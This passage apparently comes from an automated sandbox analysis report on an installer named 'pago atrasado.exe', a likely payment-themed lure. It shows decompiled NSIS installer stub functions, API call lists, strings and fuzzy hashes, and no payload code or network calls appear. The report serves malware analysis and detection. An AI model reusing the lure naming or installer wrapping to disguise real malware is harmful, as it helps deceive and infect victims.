					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133) {
							_t142 =  *0x423718 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421538 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                            0x0040398a
                                            0x00403993
                                            0x00403ad4
                                            0x00403ad8
                                            0x00403adc
                                            0x00403ade
                                            0x00403ae3
                                            0x00403aee
                                            0x00403af9
                                            0x00403afe
                                            0x00403b00
                                            0x00403b02
                                            0x00403b05
                                            0x00403b0a
                                            0x00403b18
                                            0x00403b25
                                            0x00403b2c
                                            0x00403b2c
                                            0x00403b2d
                                            0x00403b2d
                                            0x00403b32
                                            0x00403b38
                                            0x00403b3f
                                            0x00403b45
                                            0x00403b47
                                            0x00403b87
                                            0x00403b8c
                                            0x00403b91
                                            0x00403b91
                                            0x00403b96
                                            0x00403b9f
                                            0x00403ba1
                                            0x00403ba6
                                            0x00403bac
                                            0x00403bb0
                                            0x00403bb0
                                            0x00403bb5
                                            0x00403bbb
                                            0x00000000
                                            0x00000000
                                            0x00403bc1
                                            0x00403bc6
                                            0x00403bcc
                                            0x00000000
                                            0x00000000
                                            0x00403bd5
                                            0x00403bdd
                                            0x00403be2
                                            0x00403be5
                                            0x00403beb
                                            0x00403bf0
                                            0x00403bf3
                                            0x00403bf9
                                            0x00403bfe
                                            0x00403c01
                                            0x00403c07
                                            0x00403c0f
                                            0x00403c15
                                            0x00403c1b
                                            0x00403c1f
                                            0x00403c26
                                            0x00403c26
                                            0x00403c26
                                            0x00403c30
                                            0x00403c42
                                            0x00403c4e
                                            0x00403c53
                                            0x00403c5d
                                            0x00403c63
                                            0x00403c65
                                            0x00403c6a
                                            0x00403c67
                                            0x00403c67
                                            0x00403c67
                                            0x00403c7a
                                            0x00403c92
                                            0x00403c94
                                            0x00403c9a
                                            0x00403caf
                                            0x00403c9c
                                            0x00403ca5
                                            0x00403ca7
                                            0x00403ca7
                                            0x00403cb5
                                            0x00403cc5
                                            0x00403cd6
                                            0x00403cdd
                                            0x00403ce3
                                            0x00403ce7
                                            0x00403cec
                                            0x00403cee
                                            0x00000000
                                            0x00403cf4
                                            0x00403cf4
                                            0x00403cf6
                                            0x00000000
                                            0x00000000
                                            0x00403cfc
                                            0x00403d00
                                            0x00403d25
                                            0x00403d2b
                                            0x00403d31
                                            0x00403d33
                                            0x00000000
                                            0x00000000
                                            0x00403d59
                                            0x00403d5f
                                            0x00403d61
                                            0x00403d66
                                            0x00000000
                                            0x00000000
                                            0x00403d6c
                                            0x00403d6f
                                            0x00403d72
                                            0x00403d89
                                            0x00403d95
                                            0x00403dae
                                            0x00403db4
                                            0x00403db8
                                            0x00403dbd
                                            0x00403dc3
                                            0x00000000
                                            0x00000000
                                            0x00403dcd
                                            0x00403dd8
                                            0x00000000
                                            0x00403dd8
                                            0x00403d02
                                            0x00403d08
                                            0x00000000
                                            0x00000000
                                            0x00403d0e
                                            0x00403d14
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403d1a
                                            0x00403cee
                                            0x00403de5
                                            0x00403df1
                                            0x00403df8
                                            0x00000000
                                            0x00403b49
                                            0x00403b49
                                            0x00403b4c
                                            0x00403b7f
                                            0x00403b7f
                                            0x00403b81
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403b81
                                            0x00403b4e
                                            0x00403b52
                                            0x00403b57
                                            0x00403b59
                                            0x00000000
                                            0x00000000
                                            0x00403b69
                                            0x00403b71
                                            0x00000000
                                            0x00403b77
                                            0x004039a5
                                            0x004039a5
                                            0x004039a9
                                            0x004039ae
                                            0x004039bd
                                            0x004039bd
                                            0x004039c6
                                            0x004039cf
                                            0x004039da
                                            0x004039da
                                            0x004039e6
                                            0x00403a02
                                            0x00403a05
                                            0x00403a18
                                            0x00403a1e
                                            0x00403ac1
                                            0x00000000
                                            0x00403aca
                                            0x00403a24
                                            0x00403a31
                                            0x00403a33
                                            0x00403a35
                                            0x00403a54
                                            0x00403a54
                                            0x00403a57
                                            0x00403a5c
                                            0x00403a5f
                                            0x00403a6f
                                            0x00403a70
                                            0x00403a72
                                            0x00403aa8
                                            0x00403abb
                                            0x00000000
                                            0x00403abb
                                            0x00403a74
                                            0x00403a7a
                                            0x00403a93
                                            0x00403a98
                                            0x00403a9a
                                            0x00000000
                                            0x00000000
                                            0x00403a9c
                                            0x00403a88
                                            0x00403a88
                                            0x00403a8a
                                            0x00403a8a
                                            0x00000000
                                            0x00403a8a
                                            0x00403a7d
                                            0x00403a82
                                            0x00000000
                                            0x00403a82
                                            0x00403a61
                                            0x00403a67
                                            0x00000000
                                            0x00000000
                                            0x00403a69
                                            0x00000000
                                            0x00403a69
                                            0x00403a59
                                            0x00000000
                                            0x00403a59
                                            0x00403a3f
                                            0x00403a46
                                            0x00403a4c
                                            0x00403a4e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403a4e
                                            0x00403a0a
                                            0x00000000
                                            0x004039e8
                                            0x004039ee
                                            0x004039f8
                                            0x00403dfe
                                            0x00403e04
                                            0x00403e06
                                            0x00403e0c
                                            0x00403e11
                                            0x00403e17
                                            0x00403e17
                                            0x00403e0c
                                            0x00403e21
                                            0x00000000
                                            0x00403e21
                                            0x004039e6

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                            • ShowWindow.USER32(?), ref: 004039DA
                                            • DestroyWindow.USER32 ref: 004039EE
                                            • SetWindowLongA.USER32 ref: 00403A0A
                                            • GetDlgItem.USER32 ref: 00403A2B
                                            • SendMessageA.USER32 ref: 00403A3F
                                            • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                            • GetDlgItem.USER32 ref: 00403AF4
                                            • GetDlgItem.USER32 ref: 00403AFE
                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                                            • SendMessageA.USER32 ref: 00403B69
                                            • GetDlgItem.USER32 ref: 00403C0F
                                            • ShowWindow.USER32(00000000,?), ref: 00403C30
                                            • EnableWindow.USER32(?,?), ref: 00403C42
                                            • EnableWindow.USER32(?,?), ref: 00403C5D
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                                            • EnableMenuItem.USER32 ref: 00403C7A
                                            • SendMessageA.USER32 ref: 00403C92
                                            • SendMessageA.USER32 ref: 00403CA5
                                            • lstrlenA.KERNEL32(00420538,?,00420538,cuflzcqvvfgho Setup), ref: 00403CCE
                                            • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                            • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                            • String ID: cuflzcqvvfgho Setup
                                            • API String ID: 4050669955-3787857590
                                            • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                            • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                            • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                            • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50; // 0x661638
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t24 =  *0x423f58; // 0x80
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x423fc0 = _t24 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5); // executed
							_t37 = E00405EBA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t39 =  *0x423720; // 0x0
							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40; // 0x400000
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 = _t76;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423f78; // 0x6656e0
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x63
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                            0x004035f1
                                            0x004035fa
                                            0x00403601
                                            0x00403603
                                            0x00403617
                                            0x00403629
                                            0x00403633
                                            0x00403638
                                            0x0040363e
                                            0x00403651
                                            0x00403651
                                            0x0040365c
                                            0x00403605
                                            0x00403610
                                            0x00403610
                                            0x00403661
                                            0x00403666
                                            0x0040366b
                                            0x00403674
                                            0x00403679
                                            0x0040368a
                                            0x00403711
                                            0x00403719
                                            0x00403722
                                            0x00403722
                                            0x00403738
                                            0x0040373e
                                            0x0040374c
                                            0x004037db
                                            0x004037e3
                                            0x004037ed
                                            0x004037f2
                                            0x004037f8
                                            0x00403882
                                            0x00403887
                                            0x00403889
                                            0x004038a5
                                            0x00000000
                                            0x004038a5
                                            0x0040388b
                                            0x00403891
                                            0x00403899
                                            0x00403899
                                            0x00000000
                                            0x00403891
                                            0x00403806
                                            0x00403811
                                            0x00403816
                                            0x00403818
                                            0x0040381f
                                            0x0040381f
                                            0x0040382a
                                            0x00403832
                                            0x00403834
                                            0x00403836
                                            0x0040383f
                                            0x00403842
                                            0x00403848
                                            0x00403848
                                            0x0040384e
                                            0x00403867
                                            0x00403878
                                            0x00000000
                                            0x0040387d
                                            0x004037e5
                                            0x004037e7
                                            0x00000000
                                            0x00403752
                                            0x00403752
                                            0x00403758
                                            0x00403762
                                            0x0040376a
                                            0x00403774
                                            0x0040377a
                                            0x00403788
                                            0x004038aa
                                            0x004038aa
                                            0x00000000
                                            0x004038aa
                                            0x0040378e
                                            0x00403797
                                            0x004037d6
                                            0x00000000
                                            0x004037d6
                                            0x00403690
                                            0x00403690
                                            0x00403695
                                            0x00000000
                                            0x00000000
                                            0x0040369a
                                            0x0040369f
                                            0x004036af
                                            0x004036b4
                                            0x004036bb
                                            0x00000000
                                            0x00000000
                                            0x004036bf
                                            0x004036c1
                                            0x004036ce
                                            0x004036ce
                                            0x004036d6
                                            0x004036dc
                                            0x00403704
                                            0x0040370c
                                            0x00000000
                                            0x004036ee
                                            0x004036ef
                                            0x004036f8
                                            0x004036fe
                                            0x004036ff
                                            0x00000000
                                            0x004036ff
                                            0x004036fa
                                            0x004036fc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004036fc
                                            0x004036dc

                                            APIs
                                              • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                              • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                            • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000), ref: 0040365C
                                            • lstrlenA.KERNEL32(cuwawvnlx,?,?,?,cuwawvnlx,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                            • lstrcmpiA.KERNEL32(?,.exe,cuwawvnlx,?,?,?,cuwawvnlx,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                            • GetFileAttributesA.KERNEL32(cuwawvnlx), ref: 004036EF
                                            • LoadImageA.USER32 ref: 00403738
                                              • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                            • RegisterClassA.USER32 ref: 0040377F
                                            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                            • CreateWindowExA.USER32 ref: 004037D0
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                            • GetClassInfoA.USER32 ref: 00403832
                                            • GetClassInfoA.USER32 ref: 0040383F
                                            • RegisterClassA.USER32 ref: 00403848
                                            • DialogBoxParamA.USER32 ref: 00403867
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$cuwawvnlx$6B
                                            • API String ID: 1975747703-3229038323
                                            • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                            • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                            • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                            • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\pago atrasado.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\pago atrasado.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E00405B98("C:\\Users\\alfons\\Desktop", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x423f54 - _t82; // 0x8200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423f54; // 0x8200
						E004030B3(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
								__eflags =  *0x423f5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					_t65 = E00403081( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423f54; // 0x8200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f54;
						if( *0x423f54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b0d8; // 0x8200
						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423f54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f0e8;
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                            0x00402c5d
                                            0x00402c60
                                            0x00402c63
                                            0x00402c66
                                            0x00402c6c
                                            0x00402c7d
                                            0x00402c82
                                            0x00402c95
                                            0x00402c9a
                                            0x00402c9d
                                            0x00402ca3
                                            0x00000000
                                            0x00402ca5
                                            0x00402cb0
                                            0x00402cb6
                                            0x00402cc7
                                            0x00402cce
                                            0x00402cd4
                                            0x00402cd6
                                            0x00402cdb
                                            0x00402cdd
                                            0x00402dca
                                            0x00402dcc
                                            0x00402dd1
                                            0x00402dd8
                                            0x00000000
                                            0x00000000
                                            0x00402dda
                                            0x00402ddd
                                            0x00402e01
                                            0x00402e06
                                            0x00402e0c
                                            0x00402e0e
                                            0x00402e17
                                            0x00402e1c
                                            0x00402e1f
                                            0x00402e20
                                            0x00402e21
                                            0x00402e23
                                            0x00402e28
                                            0x00402e2b
                                            0x00402e3e
                                            0x00402e42
                                            0x00402e4a
                                            0x00402e4f
                                            0x00402e51
                                            0x00402e51
                                            0x00402e51
                                            0x00402e59
                                            0x00402e59
                                            0x00402e5c
                                            0x00402e5d
                                            0x00402e5d
                                            0x00402e60
                                            0x00402e62
                                            0x00402e62
                                            0x00402e62
                                            0x00402e6c
                                            0x00402e72
                                            0x00402e80
                                            0x00402e85
                                            0x00000000
                                            0x00402e85
                                            0x00000000
                                            0x00402e2b
                                            0x00402de5
                                            0x00402df0
                                            0x00402df5
                                            0x00402df7
                                            0x00000000
                                            0x00000000
                                            0x00402dfc
                                            0x00402dff
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402ce3
                                            0x00402ce8
                                            0x00402ce8
                                            0x00402ced
                                            0x00402cf1
                                            0x00402cf8
                                            0x00402cfd
                                            0x00402cff
                                            0x00402d01
                                            0x00402d01
                                            0x00402d05
                                            0x00402d0a
                                            0x00402d0c
                                            0x00402e36
                                            0x00402e2d
                                            0x00000000
                                            0x00402e2d
                                            0x00402d12
                                            0x00402d19
                                            0x00402d95
                                            0x00402d99
                                            0x00402d9d
                                            0x00402da2
                                            0x00000000
                                            0x00402d99
                                            0x00402d22
                                            0x00402d27
                                            0x00402d2a
                                            0x00402d2f
                                            0x00000000
                                            0x00000000
                                            0x00402d31
                                            0x00402d38
                                            0x00000000
                                            0x00000000
                                            0x00402d3a
                                            0x00402d41
                                            0x00000000
                                            0x00000000
                                            0x00402d43
                                            0x00402d4a
                                            0x00000000
                                            0x00000000
                                            0x00402d4c
                                            0x00402d53
                                            0x00000000
                                            0x00000000
                                            0x00402d55
                                            0x00402d5b
                                            0x00402d64
                                            0x00402d6a
                                            0x00402d6d
                                            0x00402d6f
                                            0x00402d75
                                            0x00000000
                                            0x00000000
                                            0x00402d7b
                                            0x00402d7f
                                            0x00402d87
                                            0x00402d87
                                            0x00402d8a
                                            0x00402d8d
                                            0x00402d8f
                                            0x00402d91
                                            0x00402d91
                                            0x00000000
                                            0x00402d8f
                                            0x00402d81
                                            0x00402d85
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402da3
                                            0x00402da3
                                            0x00402da9
                                            0x00402db5
                                            0x00402db5
                                            0x00402db8
                                            0x00402dbe
                                            0x00402dc0
                                            0x00402dc0
                                            0x00402dc8
                                            0x00402dc8
                                            0x00000000
                                            0x00402dc8

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402C66
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\pago atrasado.exe,00000400), ref: 00402C82
                                              • Part of subcall function 0040586F: GetFileAttributesA.KERNEL32(00000003,00402C95,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 00405873
                                              • Part of subcall function 0040586F: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                            • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pago atrasado.exe,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 00402CCE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
